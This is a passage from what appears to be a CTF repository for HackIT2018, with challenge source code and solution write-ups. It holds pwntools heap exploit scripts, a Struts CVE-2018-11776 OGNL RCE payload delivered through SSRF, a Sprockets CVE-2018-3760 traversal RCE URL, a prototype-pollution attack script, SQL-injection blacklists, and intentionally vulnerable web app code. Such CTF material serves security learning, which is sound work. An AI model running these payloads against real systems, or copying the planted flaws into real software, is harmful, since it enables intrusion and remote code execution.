p64(0xffffffffff600000) 165 | 166 | create("GGWP",90,fake_construct) 167 | raw_input("CHECK") 168 | 169 | shutdown(6) 170 | payload = "Y"*88 171 | payload += p64(0xffffffffff600000) 172 | payload += p64(0x2000) 173 | payload += p64(malloc_hook) 174 | payload += "Z"*16 175 | payload += p64(0x41) 176 | payload += p64(0x00) 177 | payload += "Z"*48 178 | payload += p64(0x31) 179 | payload += p64(0x00) 180 | payload += "Z"*32 181 | payload += p64(0x71) 182 | payload += p64(malloc_hook) 183 | edit_title(3,payload) 184 | 185 | create("GGWP",90,"LL") 186 | 187 | #p.interactive() 188 | 189 | finale = "/bin/sh\x00" 190 | finale += "X"*11 191 | finale += p64(libc + 0x398705) # far from __free_hook 192 | finale += p64(0x00)*6 193 | finale += p64(0x00)[0:6] 194 | raw_input("AS") 195 | create("GGWP",90,finale) 196 | raw_input() 197 | 198 | new = "\x00"*(0x1088-0x1d) 199 | new += p64(libc + 0x3f480)[0:6] 200 | #new = p64(0x00)*12 201 | #new += p64(libc + 0x398c1e) 202 | cr7(0,new) 203 | 204 | raw_input() 205 | #shutdown(8) 206 | 207 | p.interactive() 208 | -------------------------------------------------------------------------------- /pwn/HashMan/README.md: -------------------------------------------------------------------------------- 1 | Race condition + object confusion to trigger dangling ptr / UAF. 2 | -------------------------------------------------------------------------------- /pwn/HashMan/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | from pwn import * 3 | 4 | #p = remote("185.168.131.14",1337) 5 | p = process("./final_new") 6 | #raw_input() 7 | 8 | def menu(): 9 | p.recvuntil(">>") 10 | 11 | def create_sha(key,length,plain,desc): 12 | menu() 13 | p.sendline("1") 14 | p.recvuntil("it:") 15 | p.sendline(str(key)) 16 | p.recvuntil("plaintext:") 17 | p.sendline(str(length)) 18 | p.recvuntil("plaintext:") 19 | p.sendline(plain) 20 | p.recvuntil("feedback:") 21 | p.sendline(desc) 22 | 23 | def print_key(idx,key): 24 | menu() 25 | p.sendline("9") 26 | p.recvuntil("?") 27 | p.sendline(str(idx)) 28 | p.recvuntil("key:") 29 | p.sendline(str(key)) 30 | 31 | def edit_key(idx,key,new_d,new_feed): 32 | menu() 33 | p.sendline("8") 34 | p.recvuntil("?") 35 | p.sendline(str(idx)) 36 | p.recvuntil("key:") 37 | p.sendline(str(key)) 38 | p.recvuntil("data:") 39 | p.sendline(new_d) 40 | p.recvuntil("feedback:") 41 | p.sendline(new_feed) 42 | 43 | def free_key(idx,key): 44 | menu() 45 | p.sendline("7") 46 | p.recvuntil("?") 47 | p.sendline(str(idx)) 48 | p.recvuntil("key:") 49 | p.sendline(str(key)) 50 | 51 | def race_free_key(idx,key): 52 | menu() 53 | p.sendline("7") 54 | p.recvuntil("?") 55 | p.sendline(str(idx)) 56 | p.recvuntil("key:") 57 | 58 | def race_edit_key(idx,key,new_d,new_feed): 59 | menu() 60 | p.sendline("8") 61 | p.recvuntil("?") 62 | p.sendline(str(idx)) 63 | p.recvuntil("key:") 64 | 65 | def race_print_key(idx): 66 | menu() 67 | p.sendline("9") 68 | p.recvuntil("?") 69 | p.sendline(str(idx)) 70 | p.recvuntil("key:") 71 | 72 | def reset(): 73 | menu() 74 | p.sendline("10") 75 | 76 | 77 | create_sha(222,20,"AAAA","BBBB") 78 | create_sha(223,20,"AAAA","BBBB") 79 | sleep(6) 80 | create_sha(222,20,"AAAA","BBBB") 81 | race_print_key(2) 82 | 83 | p.recvuntil("prevented a collision") 84 | p.sendline("0") 85 | p.recvuntil("Feedback: ") 86 | p.recv(8) 87 | heap = u64(p.recv(8)) - 0x260 88 | log.success("Heap: " + hex(heap)) 89 | 90 | reset() 91 | words = "D"*8 92 | words += p64(heap+0x2b0) 93 | words += p64(0x0) 94 | fake = p64(0xb1) 95 | create_sha(260,40,"CCCC",fake) 96 | sleep(6) 97 | create_sha(260,40,"CCCC",words) 98 | race_free_key(3,260) 99 | p.recvuntil("prevented a collision") 100 | p.sendline("0") 101 | 102 | print_key(2,260) 103 | p.recvuntil("Feedback: ") 104 | p.recv(8) 105 | libc = u64(p.recv(8)) - 0x3c4b78 106 | log.success("Libc: " + hex(libc)) 107 | 108 | fake = p64(0xbf) 109 | fake += p64(libc + 0x3c4b78) 110 | fake += p64(libc + 0x3c4b78) 111 | edit_key(2,260,"VV",fake) 112 | 113 | p.interactive() 114 | -------------------------------------------------------------------------------- /pwn/HashMan/hash_man: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/pwn/HashMan/hash_man -------------------------------------------------------------------------------- /pwn/KAMIKAZE/README.md: -------------------------------------------------------------------------------- 1 | 1. Uninitialised variable exists in linked list, but not exploitable since program uses calloc. 2 | 3 | 2. Use xoring to change last nibble of calloc to 0xf. 4 | 5 | 3. Now , calloc will not perform the zero-ing operation, and result in creating the bug "uninitialized FD ptr of linked list". 6 | 7 | 4. Calloc trick I learnt from Stringer (RCTF, an XCTF league event). 8 | -------------------------------------------------------------------------------- /pwn/KAMIKAZE/kamikaze: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/pwn/KAMIKAZE/kamikaze -------------------------------------------------------------------------------- /pwn/KAMIKAZE/poc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | from pwn import * 3 | 4 | #p = remote("185.168.131.14",6200) 5 | p = process("./kamikaze") 6 | raw_input() 7 | 8 | def menu(): 9 | p.recvuntil(">>") 10 | 11 | def add_s(wei,stan_s,stan,comm): 12 | menu() 13 | p.sendline("1") 14 | p.recvuntil("song:") 15 | p.sendline(str(wei)) 16 | p.recvuntil("stanza:") 17 | p.sendline(str(stan_s)) 18 | p.recvuntil("stanza:") 19 | p.sendline(stan) 20 | p.recvuntil("too:") 21 | p.sendline(comm) 22 | 23 | def kamikaze(wei,seed): 24 | menu() 25 | p.sendline("3") 26 | p.recvuntil("weight:") 27 | p.sendline(str(wei)) 28 | p.recvuntil("seed:") 29 | p.sendline(str(seed)) 30 | 31 | def remove(wei): 32 | menu() 33 | p.sendline("4") 34 | p.recvuntil("weight:") 35 | p.sendline(str(wei)) 36 | 37 | def play(idx): 38 | menu() 39 | p.sendline("5") 40 | p.recvuntil("index:") 41 | p.sendline(str(idx)) 42 | 43 | buf = "B"*16 44 | add_s(20,30,"AAAA",buf) # head. 45 | 46 | add_s(21,30,"AAAA",buf) 47 | remove(21) 48 | 49 | add_s(21,80,"AAAA",buf) 50 | add_s(22,80,"AAAA",buf) 51 | add_s(23,30,"AAAA",buf) 52 | 53 | # overflow from 21 into 22. 54 | remove(22) 55 | kamikaze(21,14) 56 | 57 | add_s(22,80,"AAAA",buf) 58 | #p.interactive() 59 | remove(23) 60 | 61 | play(3) 62 | p.recvuntil("Weight: ") 63 | leak = p.recvline().strip("\n") 64 | heap = int(leak,16) - 0x1b0 65 | log.success("Heap: " + hex(heap)) 66 | 67 | #raw_input() 68 | #add_s(24,80,"AAAA",buf) 69 | remove(heap+0x1b0) 70 | 71 | remove(20) 72 | 73 | buf1 = "A"*8 74 | buf1 += p64(0xe1) 75 | 76 | add_s(20,30,buf1,buf) 77 | 78 | buf2 = p64(0x80) 79 | buf2 += p64(heap+0x50) 80 | buf2 += p64(heap+0x1f0) 81 | 82 | fake = p64(0x90) 83 | fake += p64(heap+0x50) 84 | fake += p64(0x0) 85 | 86 | add_s(0,80,fake,buf) 87 | add_s(21,30,buf2,buf) 88 | 89 | remove(0x80) 90 | 91 | play(1) 92 | p.recvuntil("Stanza: ") 93 | libc = p.recv(6) + "\x00"*2 94 | libc = u64(libc) - 0x3c4b78 95 | log.success("Libc: " + hex(libc)) 96 | 97 | p.interactive() 98 | -------------------------------------------------------------------------------- /web/BabyPeeHPee/README.md: -------------------------------------------------------------------------------- 1 | This challenge is a PHP Challenge with source code access and an extension, that implemented a custom auth function 2 | The extension wasn't stripped so we could easily disasemble and figure out what's happening in IDA : 3 | 4 | Auth function : 5 | ```C 6 | Php::Parameters *__fastcall auth(Php::Parameters *a1, __int64 a2) 7 | { 8 | __int64 v2; // rax@1 9 | const char *v3; // rax@1 10 | Php::Parameters *result; // rax@1 11 | __int64 v5; // rbx@1 12 | char dest; // [sp+10h] [bp-60h]@1 13 | char v7[8]; // [sp+30h] [bp-40h]@1 14 | __int64 v8; // [sp+58h] [bp-18h]@1 15 | 16 | v8 = *MK_FP(__FS__, 40LL); 17 | strcpy(v7, "21232f297a57a5a743894a0e4a801fc3"); 18 | LODWORD(v2) = std::vector>::operator[](a2, 1LL); 19 | LODWORD(v3) = Php::Value::operator char const*(v2); 20 | strcpy(&dest, v3); 21 | Php::Value::Value(a1, v7, -1); 22 | result = a1; 23 | v5 = *MK_FP(__FS__, 40LL) ^ v8; 24 | return result; 25 | } 26 | ``` 27 | 28 | The strcpy call will copy the second argument to the dest buffer, no size checking so this is a clear buffer overflow 29 | The function will return what's in v7 array which is by default initialized as "21232f297a57a5a743894a0e4a801fc3" 30 | The space between v7 and dest is ($bp-0x40) - ($bp-0x60) = 0x20 so if we write more than 0x20(32) chars into the dest buffer we can overflow the v7 buffer , thus controlling what's the function is returning . 31 | Now let's move to the php bug, which is a trivial php type juggling, and since we control $digest value, we can make it equal to magic hash value, and exploit the type juggling vulnerability at the [line](https://github.com/DefConUA/HackIT2018/blob/master/web/PeeHPee/index.php#L17): 32 | 33 | Using : http://host/?u=240610708&p=AAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBQNKCDZO 34 | -------------------------------------------------------------------------------- /web/BabyPeeHPee/auth.id0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/BabyPeeHPee/auth.id0 -------------------------------------------------------------------------------- /web/BabyPeeHPee/auth.id1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/BabyPeeHPee/auth.id1 -------------------------------------------------------------------------------- /web/BabyPeeHPee/auth.id2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/BabyPeeHPee/auth.id2 -------------------------------------------------------------------------------- /web/BabyPeeHPee/auth.nam: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/BabyPeeHPee/auth.nam -------------------------------------------------------------------------------- /web/BabyPeeHPee/auth.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/BabyPeeHPee/auth.so -------------------------------------------------------------------------------- /web/BabyPeeHPee/auth.til: -------------------------------------------------------------------------------- 1 | IDATILLocal type definitionsgnuunx64 -------------------------------------------------------------------------------- /web/BabyPeeHPee/flag.php: -------------------------------------------------------------------------------- 1 | Baby:
You may need this and/or this
"; 10 | 11 | if (isset($_GET['source'])){ 12 | show_source(__FILE__); 13 | } 14 | 15 | $digest = @auth($username,$password); 16 | 17 | if (md5($username) == md5($digest) and $digest !== $username){ 18 | 19 | echo "you are a good boy here is your flag : $flag"; 20 | 21 | } 22 | 23 | else { 24 | echo "you are not a good boy so no flag for you :("; 25 | } 26 | 27 | -------------------------------------------------------------------------------- /web/PeeHPee2/README.md: -------------------------------------------------------------------------------- 1 | This challenge is another PHP application, where you can fetch url and see the response. 2 | It's an obvious SSRF Challenge with a blacklist filter: 3 | ```php 4 | $url = $_POST['url']; 5 | $parsed = parse_url($url); 6 | $scheme = $parsed['scheme']; 7 | if($scheme !== 'http'){ 8 | die('Hacking attempt'); 9 | } 10 | $blacklist = ["127","local","::","http://0/"]; 11 | foreach ($blacklist as $value) { 12 | if (stripos($url,$value) !== false) 13 | die('Hacking attempt'); 14 | } 15 | if (substr_count($parsed['host'], '.') > 0){ 16 | die('hacking attempt'); 17 | } 18 | ``` 19 | So it seems its not possible to use other sheme than http, also there is a filter on localhost address and ipv6 notation, and there is a count for dots in host scheme, 20 | so it seems domain bypass is not possible, One possible way to bypass this filter is use decimal notation http://2130706433/ 21 | The next step is scan internal network for other services, the only other service is running on port 8080, which shows tomcat default page. 22 | The hint suggested that I was using Struts version 2.3.14, you can then find out that this [version](https://www.securityfocus.com/bid/105125) was vulnerable to CVE-2018-11776 23 | I was using this exact container : https://github.com/bhdresh/CVE-2018-11776 24 | The only difference is that your payload will be through ssrf so you might have to encode your payloads 25 | After getting rce, the goal was to read the file /flag , the full payload(in browser) looks like : http://2130706433:8080/struts2-showcase-2.3.14/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/flag%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/help.action 26 | -------------------------------------------------------------------------------- /web/PeeHPee2/index.php: -------------------------------------------------------------------------------- 1 | 0){ 17 | die('hacking attempt'); 18 | } 19 | 20 | $ch = curl_init(); 21 | curl_setopt($ch, CURLOPT_URL, $url); 22 | curl_setopt($ch, CURLOPT_HEADER, true); 23 | curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false); 24 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 25 | $result = curl_exec($ch); 26 | } 27 | ?> 28 | 29 | 30 | 31 | 32 | Pee H Pee 33 | 34 | 35 | 36 |
37 |
38 |
39 |
40 |
41 | 42 |
43 |
44 |
45 |
46 | 47 |
48 | 49 |
50 |
51 |
52 |
53 | 54 |
55 |
56 |
57 |
58 | 59 |
60 |
61 |
62 | 63 |
64 | 65 | 66 | 67 | -------------------------------------------------------------------------------- /web/Republic_of_Gayming/README.md: -------------------------------------------------------------------------------- 1 | This challenge was provided with source code access, written in nodejs. 2 | The bug is related to prototype pollution in the [line](https://github.com/DefConUA/HackIT2018/blob/master/web/Republic_of_Gayming/app.js#L64) 3 | The general idea behind prototype pollution is when you an expression like : 4 | obj[a][b] = value 5 | 6 | And user can control a,b and value 7 | if the users sets "a" to "\__proto__" and "b" to any property , he can injects attributes in all existing objects with the value "value" 8 | for more details check [this](https://github.com/HoLyVieR/prototype-pollution-nsec18) 9 | 10 | The script I used is pretty simple, pollute array proto with attribute admintoken and an arbitrary value, then query /admin with the md5 of that value, 11 | Note: At some points lot of teams were changing the __proto__ at the same time so it became like a trivial race condition, but it can be won easy 12 | ```python 13 | import requests 14 | 15 | 16 | r = requests.post('http://185.168.131.1:3000/api',json={'row':'__proto__','col':'admintoken','data':'qqq'}) 17 | r = requests.get('http://185.168.131.1:3000/admin?querytoken=' + md5sumhex('qqq')) 18 | print r.text 19 | 20 | ``` 21 | -------------------------------------------------------------------------------- /web/Republic_of_Gayming/app.js: -------------------------------------------------------------------------------- 1 | const express = require('express') 2 | var hbs = require('hbs'); 3 | var bodyParser = require('body-parser'); 4 | const md5 = require('md5'); 5 | var morganBody = require('morgan-body'); 6 | const app = express(); 7 | var user = []; //empty for now 8 | 9 | var matrix = []; 10 | for (var i = 0; i < 3; i++){ 11 | matrix[i] = [null , null, null]; 12 | } 13 | 14 | function draw(mat) { 15 | var count = 0; 16 | for (var i = 0; i < 3; i++){ 17 | for (var j = 0; j < 3; j++){ 18 | if (matrix[i][j] !== null){ 19 | count += 1; 20 | } 21 | } 22 | } 23 | return count === 9; 24 | } 25 | 26 | app.use('/static', express.static('static')); 27 | app.use(bodyParser.json()); 28 | app.set('view engine', 'html'); 29 | morganBody(app); 30 | app.engine('html', require('hbs').__express); 31 | 32 | app.get('/', (req, res) => { 33 | 34 | for (var i = 0; i < 3; i++){ 35 | matrix[i] = [null , null, null]; 36 | 37 | } 38 | res.render('index'); 39 | }) 40 | 41 | 42 | app.get('/admin', (req, res) => { 43 | /*this is under development I guess ??*/ 44 | 45 | if(user.admintoken && req.query.querytoken && md5(user.admintoken) === req.query.querytoken){ 46 | res.send('Hey admin your flag is flag{prototype_pollution_is_very_dangerous}'); 47 | } 48 | else { 49 | res.status(403).send('Forbidden'); 50 | } 51 | } 52 | ) 53 | 54 | 55 | app.post('/api', (req, res) => { 56 | var client = req.body; 57 | var winner = null; 58 | 59 | if (client.row > 3 || client.col > 3){ 60 | client.row %= 3; 61 | client.col %= 3; 62 | } 63 | 64 | matrix[client.row][client.col] = client.data; 65 | console.log(matrix); 66 | for(var i = 0; i < 3; i++){ 67 | if (matrix[i][0] === matrix[i][1] && matrix[i][1] === matrix[i][2] ){ 68 | if (matrix[i][0] === 'X') { 69 | winner = 1; 70 | } 71 | else if(matrix[i][0] === 'O') { 72 | winner = 2; 73 | } 74 | } 75 | if (matrix[0][i] === matrix[1][i] && matrix[1][i] === matrix[2][i]){ 76 | if (matrix[0][i] === 'X') { 77 | winner = 1; 78 | } 79 | else if(matrix[0][i] === 'O') { 80 | winner = 2; 81 | } 82 | } 83 | } 84 | 85 | if (matrix[0][0] === matrix[1][1] && matrix[1][1] === matrix[2][2] && matrix[0][0] === 'X'){ 86 | winner = 1; 87 | } 88 | if (matrix[0][0] === matrix[1][1] && matrix[1][1] === matrix[2][2] && matrix[0][0] === 'O'){ 89 | winner = 2; 90 | } 91 | 92 | if (matrix[0][2] === matrix[1][1] && matrix[1][1] === matrix[2][0] && matrix[2][0] === 'X'){ 93 | winner = 1; 94 | } 95 | if (matrix[0][2] === matrix[1][1] && matrix[1][1] === matrix[2][0] && matrix[2][0] === 'O'){ 96 | winner = 2; 97 | } 98 | 99 | if (draw(matrix) && winner === null){ 100 | res.send(JSON.stringify({winner: 0})) 101 | } 102 | else if (winner !== null) { 103 | res.send(JSON.stringify({winner: winner})) 104 | } 105 | else { 106 | res.send(JSON.stringify({winner: -1})) 107 | } 108 | 109 | }) 110 | app.listen(3000, () => { 111 | console.log('app listening on port 3000!') 112 | }) 113 | 114 | -------------------------------------------------------------------------------- /web/Republic_of_Gayming/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | NODE_ENV=production node app.js 1>log.txt & 4 | -------------------------------------------------------------------------------- /web/RuAdmin/.gitignore: -------------------------------------------------------------------------------- 1 | # See https://help.github.com/articles/ignoring-files for more about ignoring files. 2 | # 3 | # If you find yourself ignoring temporary files generated by your text editor 4 | # or operating system, you probably want to add a global ignore instead: 5 | # git config --global core.excludesfile '~/.gitignore_global' 6 | 7 | # Ignore bundler config. 8 | /.bundle 9 | 10 | # Ignore all logfiles and tempfiles. 11 | /log/* 12 | /tmp/* 13 | !/log/.keep 14 | !/tmp/.keep 15 | 16 | # Ignore Byebug command history file. 17 | .byebug_history 18 | -------------------------------------------------------------------------------- /web/RuAdmin/Gemfile: -------------------------------------------------------------------------------- 1 | source 'https://rubygems.org' 2 | 3 | git_source(:github) do |repo_name| 4 | repo_name = "#{repo_name}/#{repo_name}" unless repo_name.include?("/") 5 | "https://github.com/#{repo_name}.git" 6 | end 7 | gem 'execjs' 8 | gem 'therubyracer', :platforms => :ruby 9 | gem 'carrierwave' 10 | gem 'bootstrap-sass' 11 | gem 'sprockets','3.7.0' 12 | # Bundle edge Rails instead: gem 'rails', github: 'rails/rails' 13 | gem 'rails', '~> 5.0.7' 14 | # Use mysql as the database for Active Record 15 | gem 'mysql2', '>= 0.3.18', '< 0.6.0' 16 | # Use Puma as the app server 17 | gem 'puma', '~> 3.0' 18 | # Use SCSS for stylesheets 19 | gem 'sass-rails', '~> 5.0' 20 | # Use Uglifier as compressor for JavaScript assets 21 | gem 'uglifier', '>= 1.3.0' 22 | # Use CoffeeScript for .coffee assets and views 23 | gem 'coffee-rails', '~> 4.2' 24 | # See https://github.com/rails/execjs#readme for more supported runtimes 25 | # gem 'therubyracer', platforms: :ruby 26 | 27 | # Use jquery as the JavaScript library 28 | gem 'jquery-rails' 29 | # Turbolinks makes navigating your web application faster. Read more: https://github.com/turbolinks/turbolinks 30 | gem 'turbolinks', '~> 5' 31 | # Build JSON APIs with ease. Read more: https://github.com/rails/jbuilder 32 | gem 'jbuilder', '~> 2.5' 33 | # Use Redis adapter to run Action Cable in production 34 | # gem 'redis', '~> 3.0' 35 | # Use ActiveModel has_secure_password 36 | # gem 'bcrypt', '~> 3.1.7' 37 | 38 | # Use Capistrano for deployment 39 | # gem 'capistrano-rails', group: :development 40 | 41 | group :development, :test do 42 | # Call 'byebug' anywhere in the code to stop execution and get a debugger console 43 | gem 'byebug', platform: :mri 44 | end 45 | 46 | group :development do 47 | # Access an IRB console on exception pages or by using <%= console %> anywhere in the code. 48 | gem 'web-console', '>= 3.3.0' 49 | gem 'listen', '~> 3.0.5' 50 | # Spring speeds up development by keeping your application running in the background. Read more: https://github.com/rails/spring 51 | gem 'spring' 52 | gem 'spring-watcher-listen', '~> 2.0.0' 53 | end 54 | 55 | # Windows does not include zoneinfo files, so bundle the tzinfo-data gem 56 | gem 'tzinfo-data', platforms: [:mingw, :mswin, :x64_mingw, :jruby] 57 | -------------------------------------------------------------------------------- /web/RuAdmin/README.md: -------------------------------------------------------------------------------- 1 | This challenge was a ruby on rails application. 2 | The index route redirects to a login page, which is vulnerable to sql injection 3 | After people bypass auth with simple payloads like `' or 1=1 #` you will know that the goal is to retreive admin password using sqli and login into /admin. 4 | The filter was : 5 | ```RUBY 6 | hack = /union|benchmark|strcmp|locate|STRCMP|position|file|concat|sleep|md5|mid|sub|count|and|left|load|space|instr|pad|conv|right|ascii|cast|reverse|locate|glob|having|like|match|char|regexp|limit|order|group|hex|information/i 7 | ``` 8 | So there is no substr functions no unions etc ... 9 | A possible solution(there are others) is to use insert function basically you can do : 10 | SELECT ('a')=(insert((SELECT password from users where isadmin=1), 2, 255, '')); 11 | And do blind injection to retreive password, more details about this technique are [here](https://gist.github.com/stypr/43fce10db9fa44b5f072442245d9e82e) 12 | After finding the admin password and login into /admin, we will be redirected to /upload where you can upload any file you want, the only thing that is returned is the PATH of that file. 13 | Gemfile shows the version of Sprockets that was used, which was vulnerable to CVE-2018-3760 14 | Basically you need to upload an erb file containing your payload and abuse the CVE to get RCE : 15 | The payload for rce looks like : http://185.168.131.128:8080/assets/file:%2f%2f/home/web03/app/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252E%252E/%252E%252E/home/web03/app/uploads/resumes/someHash/file.erb%3Ftype=text/plain 16 | For more details about the CVE , check Orange Tsai talk at BHUSA 2018. 17 | Note: The application was on production mode but flag assets.compile was on. 18 | -------------------------------------------------------------------------------- /web/RuAdmin/Rakefile: -------------------------------------------------------------------------------- 1 | # Add your own tasks in files placed in lib/tasks ending in .rake, 2 | # for example lib/tasks/capistrano.rake, and they will automatically be available to Rake. 3 | 4 | require_relative 'config/application' 5 | 6 | Rails.application.load_tasks 7 | -------------------------------------------------------------------------------- /web/RuAdmin/app/assets/config/manifest.js: -------------------------------------------------------------------------------- 1 | //= link_tree ../images 2 | //= link_directory ../javascripts .js 3 | //= link_directory ../stylesheets .css 4 | -------------------------------------------------------------------------------- /web/RuAdmin/app/assets/images/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/app/assets/images/.keep -------------------------------------------------------------------------------- /web/RuAdmin/app/assets/javascripts/application.js: -------------------------------------------------------------------------------- 1 | // This is a manifest file that'll be compiled into application.js, which will include all the files 2 | // listed below. 3 | // 4 | // Any JavaScript/Coffee file within this directory, lib/assets/javascripts, vendor/assets/javascripts, 5 | // or any plugin's vendor/assets/javascripts directory can be referenced here using a relative path. 6 | // 7 | // It's not advisable to add code directly here, but if you do, it'll appear at the bottom of the 8 | // compiled file. JavaScript code in this file should be added after the last require_* statement. 9 | // 10 | // Read Sprockets README (https://github.com/rails/sprockets#sprockets-directives) for details 11 | // about supported directives. 12 | // 13 | //= require jquery 14 | //= require jquery_ujs 15 | //= require turbolinks 16 | //= require_tree . 17 | function validateFiles(inputFile) { 18 | var maxExceededMessage = "This file exceeds the maximum allowed file size (5 MB)"; 19 | var extErrorMessage = "Only image file with extension: .jpg, .jpeg, .gif or .png is allowed"; 20 | var allowedExtension = ["jpg", "jpeg", "gif", "png"]; 21 | 22 | var extName; 23 | var maxFileSize = $(inputFile).data('max-file-size'); 24 | var sizeExceeded = false; 25 | var extError = false; 26 | 27 | $.each(inputFile.files, function() { 28 | if (this.size && maxFileSize && this.size > parseInt(maxFileSize)) {sizeExceeded=true;}; 29 | extName = this.name.split('.').pop(); 30 | if ($.inArray(extName, allowedExtension) == -1) {extError=true;}; 31 | }); 32 | if (sizeExceeded) { 33 | window.alert(maxExceededMessage); 34 | $(inputFile).val(''); 35 | }; 36 | } 37 | 38 | 39 | -------------------------------------------------------------------------------- /web/RuAdmin/app/assets/javascripts/cable.js: -------------------------------------------------------------------------------- 1 | // Action Cable provides the framework to deal with WebSockets in Rails. 2 | // You can generate new channels where WebSocket features live using the rails generate channel command. 3 | // 4 | //= require action_cable 5 | //= require_self 6 | //= require_tree ./channels 7 | 8 | (function() { 9 | this.App || (this.App = {}); 10 | 11 | App.cable = ActionCable.createConsumer(); 12 | 13 | }).call(this); 14 | -------------------------------------------------------------------------------- /web/RuAdmin/app/assets/javascripts/channels/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/app/assets/javascripts/channels/.keep -------------------------------------------------------------------------------- /web/RuAdmin/app/assets/javascripts/resumes.coffee: -------------------------------------------------------------------------------- 1 | # Place all the behaviors and hooks related to the matching controller here. 2 | # All this logic will automatically be available in application.js. 3 | # You can use CoffeeScript in this file: http://coffeescript.org/ 4 | -------------------------------------------------------------------------------- /web/RuAdmin/app/assets/javascripts/sessions.coffee: -------------------------------------------------------------------------------- 1 | # Place all the behaviors and hooks related to the matching controller here. 2 | # All this logic will automatically be available in application.js. 3 | # You can use CoffeeScript in this file: http://coffeescript.org/ 4 | -------------------------------------------------------------------------------- /web/RuAdmin/app/assets/javascripts/users.coffee: -------------------------------------------------------------------------------- 1 | # Place all the behaviors and hooks related to the matching controller here. 2 | # All this logic will automatically be available in application.js. 3 | # You can use CoffeeScript in this file: http://coffeescript.org/ 4 | -------------------------------------------------------------------------------- /web/RuAdmin/app/assets/stylesheets/application.css: -------------------------------------------------------------------------------- 1 | /* 2 | * This is a manifest file that'll be compiled into application.css, which will include all the files 3 | * listed below. 4 | * 5 | * Any CSS and SCSS file within this directory, lib/assets/stylesheets, vendor/assets/stylesheets, 6 | * or any plugin's vendor/assets/stylesheets directory can be referenced here using a relative path. 7 | * 8 | * You're free to add application-wide styles to this file and they'll appear at the bottom of the 9 | * compiled file so the styles you add here take precedence over styles defined in any other CSS/SCSS 10 | * files in this directory. Styles in this file should be added after the last require_* statement. 11 | * It is generally better to create a new file per style scope. 12 | * 13 | *= require_tree . 14 | *= require_self 15 | */ 16 | -------------------------------------------------------------------------------- /web/RuAdmin/app/assets/stylesheets/resumes.scss: -------------------------------------------------------------------------------- 1 | 2 | // Place all the styles related to the Resumes controller here. 3 | // They will automatically be included in application.css. 4 | // You can use Sass (SCSS) here: http://sass-lang.com/ 5 | @import "bootstrap"; 6 | -------------------------------------------------------------------------------- /web/RuAdmin/app/assets/stylesheets/sessions.scss: -------------------------------------------------------------------------------- 1 | // Place all the styles related to the sessions controller here. 2 | // They will automatically be included in application.css. 3 | // You can use Sass (SCSS) here: http://sass-lang.com/ 4 | -------------------------------------------------------------------------------- /web/RuAdmin/app/assets/stylesheets/users.scss: -------------------------------------------------------------------------------- 1 | // Place all the styles related to the users controller here. 2 | // They will automatically be included in application.css. 3 | // You can use Sass (SCSS) here: http://sass-lang.com/ 4 | -------------------------------------------------------------------------------- /web/RuAdmin/app/channels/application_cable/channel.rb: -------------------------------------------------------------------------------- 1 | module ApplicationCable 2 | class Channel < ActionCable::Channel::Base 3 | end 4 | end 5 | -------------------------------------------------------------------------------- /web/RuAdmin/app/channels/application_cable/connection.rb: -------------------------------------------------------------------------------- 1 | module ApplicationCable 2 | class Connection < ActionCable::Connection::Base 3 | end 4 | end 5 | -------------------------------------------------------------------------------- /web/RuAdmin/app/controllers/application_controller.rb: -------------------------------------------------------------------------------- 1 | class ApplicationController < ActionController::Base 2 | protect_from_forgery with: :exception 3 | end 4 | -------------------------------------------------------------------------------- /web/RuAdmin/app/controllers/concerns/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/app/controllers/concerns/.keep -------------------------------------------------------------------------------- /web/RuAdmin/app/controllers/home_controller.rb: -------------------------------------------------------------------------------- 1 | class HomeController < ApplicationController 2 | 3 | def index 4 | if session[:user_logged_in] 5 | render "index" 6 | else 7 | redirect_to login_url 8 | end 9 | end 10 | 11 | end 12 | -------------------------------------------------------------------------------- /web/RuAdmin/app/controllers/resumes_controller.rb: -------------------------------------------------------------------------------- 1 | class ResumesController < ApplicationController 2 | before_filter :beforeFilter 3 | 4 | def beforeFilter 5 | $request = request 6 | end 7 | def index 8 | if session[:admin] 9 | require 'digest' 10 | digest = Digest::SHA256.hexdigest $request.remote_ip + $request.remote_ip 11 | @resumes = Dir.glob("uploads/resumes/#{digest}/*").map(&File.method(:realpath)); 12 | else 13 | redirect_to login_url 14 | end 15 | end 16 | 17 | def new 18 